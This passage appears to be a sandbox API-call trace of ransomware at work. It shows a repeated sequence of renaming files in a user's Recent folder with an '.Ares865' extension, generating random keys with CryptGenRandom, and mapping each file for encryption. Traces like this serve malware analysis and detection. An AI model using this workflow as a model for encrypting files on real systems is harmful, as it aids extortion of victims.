"c:\\users\\5p5nrgjn0js halpmcxz\\recent\\aunb46i.ots.lnk.ares865"), dwFlags=0x1) returned 1 [0093.126] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AunB46i.ots.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\aunb46i.ots.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.126] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3748) returned 1 [0093.126] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.127] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.127] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.127] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11b0, lpName=0x0) returned 0x15c [0093.127] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11b0) returned 0x190000 [0093.128] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.129] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.129] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.130] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AVtsQ.lnk.Ares865") returned 54 [0093.130] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AVtsQ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\avtsq.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AVtsQ.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\avtsq.lnk.ares865"), dwFlags=0x1) returned 1 [0093.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AVtsQ.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\avtsq.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.132] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8299) returned 1 [0093.132] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.133] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.133] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.133] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2370, lpName=0x0) returned 0x15c [0093.133] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2370) returned 0x190000 [0093.134] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.134] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.134] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.136] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\BpWpCzm981jZsivJgFs.lnk.Ares865") returned 68 [0093.136] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\BpWpCzm981jZsivJgFs.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\bpwpczm981jzsivjgfs.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\BpWpCzm981jZsivJgFs.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\bpwpczm981jzsivjgfs.lnk.ares865"), dwFlags=0x1) returned 1 [0093.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\BpWpCzm981jZsivJgFs.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\bpwpczm981jzsivjgfs.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.137] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=624) returned 1 [0093.138] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.138] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.138] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.138] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x570, lpName=0x0) returned 0x15c [0093.139] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x570) returned 0x190000 [0093.139] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.139] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.139] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.142] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\bpyt e.lnk.Ares865") returned 55 [0093.142] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\bpyt e.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\bpyt e.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\bpyt e.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\bpyt e.lnk.ares865"), dwFlags=0x1) returned 1 [0093.143] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\bpyt e.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\bpyt e.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.143] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2567) returned 1 [0093.144] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.144] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.144] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.145] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd10, lpName=0x0) returned 0x15c [0093.145] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd10) returned 0x190000 [0093.145] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.145] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.146] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.147] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\c9gh2C4WHptCgA_N.flv.lnk.Ares865") returned 69 [0093.147] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\c9gh2C4WHptCgA_N.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\c9gh2c4whptcga_n.flv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\c9gh2C4WHptCgA_N.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\c9gh2c4whptcga_n.flv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.148] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\c9gh2C4WHptCgA_N.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\c9gh2c4whptcga_n.flv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.148] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5224) returned 1 [0093.148] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.149] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.149] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.149] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1770, lpName=0x0) returned 0x15c [0093.149] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1770) returned 0x190000 [0093.150] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.150] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.150] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.152] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\cbSsZK4HFXH0NDh.lnk.Ares865") returned 64 [0093.152] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\cbSsZK4HFXH0NDh.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\cbsszk4hfxh0ndh.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\cbSsZK4HFXH0NDh.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\cbsszk4hfxh0ndh.lnk.ares865"), dwFlags=0x1) returned 1 [0093.153] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\cbSsZK4HFXH0NDh.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\cbsszk4hfxh0ndh.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.153] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1035) returned 1 [0093.153] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.154] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.154] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.154] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x15c [0093.154] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x190000 [0093.155] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.155] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.155] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.157] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CNGQLjAz7s.lnk.Ares865") returned 59 [0093.157] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CNGQLjAz7s.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\cngqljaz7s.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CNGQLjAz7s.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\cngqljaz7s.lnk.ares865"), dwFlags=0x1) returned 1 [0093.158] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CNGQLjAz7s.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\cngqljaz7s.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.158] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1010) returned 1 [0093.158] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.159] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.159] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.159] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x15c [0093.159] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x190000 [0093.159] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.160] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.160] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.162] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\d2aTqFV_t.lnk.Ares865") returned 58 [0093.162] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\d2aTqFV_t.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\d2atqfv_t.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\d2aTqFV_t.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\d2atqfv_t.lnk.ares865"), dwFlags=0x1) returned 1 [0093.163] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\d2aTqFV_t.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\d2atqfv_t.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.163] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3896) returned 1 [0093.163] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.164] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.164] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.164] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1240, lpName=0x0) returned 0x15c [0093.164] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1240) returned 0x190000 [0093.165] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.165] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.165] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.167] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\desktop.ini.Ares865") returned 56 [0093.167] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0093.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.168] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=432) returned 1 [0093.168] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.169] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.169] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.169] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x15c [0093.170] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0093.170] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.171] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.171] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.172] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\DsUw0nvoP7YOwlHK-m.lnk.Ares865") returned 67 [0093.172] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\DsUw0nvoP7YOwlHK-m.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\dsuw0nvop7yowlhk-m.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\DsUw0nvoP7YOwlHK-m.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\dsuw0nvop7yowlhk-m.lnk.ares865"), dwFlags=0x1) returned 1 [0093.173] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\DsUw0nvoP7YOwlHK-m.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\dsuw0nvop7yowlhk-m.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.173] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6548) returned 1 [0093.174] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.174] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.174] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.175] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1ca0, lpName=0x0) returned 0x15c [0093.175] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ca0) returned 0x190000 [0093.175] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.176] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.176] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.177] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\dxkWKFD3SrT0.lnk.Ares865") returned 61 [0093.177] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\dxkWKFD3SrT0.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\dxkwkfd3srt0.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\dxkWKFD3SrT0.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\dxkwkfd3srt0.lnk.ares865"), dwFlags=0x1) returned 1 [0093.179] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\dxkWKFD3SrT0.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\dxkwkfd3srt0.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.179] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5285) returned 1 [0093.179] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.180] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.180] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.180] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17b0, lpName=0x0) returned 0x15c [0093.180] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17b0) returned 0x190000 [0093.180] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.181] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.181] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.183] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\e05bJ_sEsi1KyR49lWdn.flv.lnk.Ares865") returned 73 [0093.183] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\e05bJ_sEsi1KyR49lWdn.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\e05bj_sesi1kyr49lwdn.flv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\e05bJ_sEsi1KyR49lWdn.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\e05bj_sesi1kyr49lwdn.flv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.184] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\e05bJ_sEsi1KyR49lWdn.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\e05bj_sesi1kyr49lwdn.flv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.184] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5268) returned 1 [0093.184] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.185] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.185] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.185] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17a0, lpName=0x0) returned 0x15c [0093.185] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17a0) returned 0x190000 [0093.185] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, 